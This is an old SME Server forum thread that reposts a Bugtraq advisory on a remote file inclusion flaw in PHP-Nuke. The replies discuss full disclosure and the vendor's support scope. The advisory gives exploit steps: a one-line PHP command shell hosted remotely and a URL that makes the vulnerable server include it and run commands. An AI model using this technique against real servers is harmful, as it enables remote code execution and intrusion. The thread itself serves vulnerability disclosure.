Koozali.org: home of the SME Server

Legacy Forums => Experienced User Forum => Topic started by: guestHH on January 17, 2002, 01:43:59 AM

Title: New possible danger with PHP-Nuke????
Post by: guestHH on January 17, 2002, 01:43:59 AM

Quote"

From Bugtraq, by Handle Nopman [nopman@hackermail.com]

Hi All!

I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.

The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...

How to exploit:
Upload this file to some free web space provider or
setup your own server:
system($cmd);
?>
Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)

Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.

Sincrely
"Nopman"

" unquote

Don't want to scare you in any way, but sounds interesting enough to investigate i think. Just to let you know.

HFW

Title: Re: New possible danger with PHP-Nuke????
Post by: Alejandro on January 17, 2002, 07:26:29 PM

Do You think this help anyone of sme users?
I fell like some one is telling everybody how could my server be entered.
I think there is a lot of security rules that advice us not to publish this kind of data (specially exploitable one) in an open forurm.
Anyway  there is an address for that kind of subjects enabled by the support team.

Title: Re: New possible danger with PHP-Nuke????
Post by: Rich Lafferty on January 17, 2002, 07:33:05 PM

While I don't really want to enter into another discussion on the merits and
risks of full disclosure, I *should* point out that PHP-Nuke is entirely
unsupported by Mitel Networks. The proper destination for reports of problems
with PHP-Nuke is the author of PHP-Nuke.

(The original post was a copy of a post sent to the public mailing list,
BUGTRAQ, and not a report of a compromised server. We *do* request
that reports of compromised e-smith and SME Server systems go to
security@e-smith.com before being announced publicly, but that request
doesn't apply in this instance as no specific system was breached.)

Cheers,

-Rich

Title: Re: New possible danger with PHP-Nuke????
Post by: guestHH on January 17, 2002, 10:00:21 PM

Hi Alejandro and Rich,

I agree with Rich on the matter that it is not an e-smith (SME) issue. It is an issue that concerns SME users who use PHP-Nuke. My understanding is that there is a quit a number of PHP-Nuke users among the SME users, according to the earlier warning issued by Mitel on their www.e-smith.org website.

Also as Rich stated it is a thread copy of a public mailing list, so I just 'forwarded' it to so that SME + PHP-Nuke users know about it in cases they do not follow the PUBLIC bugtraq mailing list.

In any other case (concerning SME server) I would follow the zillion times expressed way to reports bugs c.q. security issues directly to MITEL.

Thanks.

guest